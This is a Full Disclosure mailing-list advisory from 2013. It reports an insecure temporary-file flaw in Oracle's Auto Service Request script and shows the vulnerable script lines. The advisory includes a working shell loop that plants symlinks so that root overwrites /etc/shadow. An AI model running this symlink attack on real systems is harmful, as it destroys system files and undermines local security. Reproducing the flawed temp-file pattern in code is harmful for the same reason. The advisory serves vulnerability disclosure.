Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Oracle Auto Service Request /tmp file clobbering vulnerability
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Fri, 01 Mar 2013 03:55:41 +0000 (GMT)

Oracle Auto Service Request  /tmp file clobbering vulnerability


I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp().  You can clobber root owned files 
if you know when around the time the root administrator will be using this utility.

[larry () oracle-os-lab01 tmp]$ for x in `seq  500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done

root executes the asr command:

[root () oracle-os-lab01 bin]# ./asr

        register OR register [-e asr-manager-relay-url]: register ASR
        unregister : unregister ASR
        show_reg_status : show ASR registration status
        test_connection : test connection to Oracle

        version : show asr script version
        help : display a list of commands
        ? : display a list of commands

/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow

id      State       Bundle
68      ACTIVE      com.sun.svc.asr.sw_4.3.1
                    Fragments=69, 70
69      RESOLVED    com.sun.svc.asr.sw-frag_4.3.1
70      RESOLVED    com.sun.svc.asr.sw-rulesdefinitions_4.3.1
72      ACTIVE      com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
73      RESOLVED    com.sun.svc.asr.sw.http-frag_1.0.0

67      ACTIVE      com.sun.svc.ServiceActivation_4.3.1

Problem code:
The asr binary is a wrapper for a java class, the following snippet of code is where the error lies:

/sbin/sh:root () unix-solaris# grep -n tmp asr 409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410:    file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
411:    file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
557:            file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
681:        file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
691:        file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
706:    file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'`
710:    file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'`
797:   file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
987:    hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'`
988:    tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`
989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'` 1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334:    file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1343:    file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1344:    file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
1345:    file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
1405:                   tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
2198:                           tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`

This affects the software package on both Solaris and Linux.

Vendor notified about a month ago.

Larry W. Cashdollar
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Oracle Auto Service Request /tmp file clobbering vulnerability Larry W. Cashdollar (Mar 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]